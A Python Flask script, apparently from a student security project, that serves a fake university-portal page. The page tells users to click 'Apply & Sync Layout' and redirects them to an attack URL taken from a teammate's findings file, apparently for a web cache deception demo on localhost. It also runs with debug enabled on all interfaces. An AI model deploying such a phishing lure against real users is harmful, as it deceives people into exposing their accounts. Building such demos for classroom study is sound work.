#!/usr/bin/env python3
import json
import os
import sys
from flask import Flask, render_template_string, redirect

app = Flask(__name__)

# Locate the findings.json relative to this script
FINDINGS_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'findings.json'))

def get_vulnerable_url():
    """Reads the JSON output generated by Member 2's detection engine."""
    default_fallback = "http://localhost:8080/profile/5mtprf7qq7ygnae.css"
    
    if not os.path.exists(FINDINGS_PATH):
        print(f"[!] Warning: {FINDINGS_PATH} not found. Using default fallback URL for presentation.")
        return default_fallback
        
    try:
        with open(FINDINGS_PATH, "r", encoding="utf-8") as f:
            findings = json.load(f)
            # Find the first suspicious path parameter or encoded slash finding
            for finding in findings:
                if finding.get("status") == "suspicious" or finding.get("attack_url"):
                    return finding["attack_url"]
    except Exception as e:
        print(f"[-] Error reading findings file: {e}")
        
    return default_fallback

@app.route('/')
def index():
    target_url = get_vulnerable_url()
    
    # HTML template representing the attacker's simulated phishing portal
    html_content = """
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>University Student Portal Update</title>
        <style>
            body {
                font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
                background-color: #f4f6f9;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                margin: 0;
            }
            .card {
                background: white;
                padding: 40px;
                border-radius: 8px;
                box-shadow: 0 4px 15px rgba(0,0,0,0.1);
                text-align: center;
                max-width: 450px;
            }
            h1 { color: #2c3e50; font-size: 24px; margin-bottom: 10px; }
            p { color: #7f8c8d; font-size: 14px; line-height: 1.5; margin-bottom: 30px; }
            .btn {
                background-color: #3498db;
                color: white;
                border: none;
                padding: 12px 28px;
                font-size: 16px;
                font-weight: bold;
                border-radius: 4px;
                cursor: pointer;
                text-decoration: none;
                transition: background 0.2s;
            }
            .btn:hover { background-color: #2980b9; }
            .meta { margin-top: 25px; font-size: 11px; color: #bdc3c7; }
        </style>
    </head>
    <body>
        <div class="card">
            <h1>New Portal Styles Available</h1>
            <p>Your university course environment has been updated with a optimized layout stylesheet. Click the validation link below to sync your local cache views.</p>
            <a href="/redirect-target" class="btn">Apply & Sync Layout</a>
            <div class="meta">Target payload link: <br><code>{{ target_url }}</code></div>
        </div>
    </body>
    </html>
    """
    return render_template_string(html_content, target_url=target_url)

@app.route('/redirect-target')
def redirect_target():
    target_url = get_vulnerable_url()
    print(f"[+] Presentation Log: User clicked button. Redirecting to target payload: {target_url}")
    return redirect(target_url)

if __name__ == '__main__':
    print("======================================================================")
    print("Member 4 - Presentation Phishing Landing Page Engine")
    print("======================================================================")
    # Run on a distinct port (9090) so it doesn't clash with Nginx (8080) or Flask (5000)
    app.run(host='0.0.0.0', port=9090, debug=True)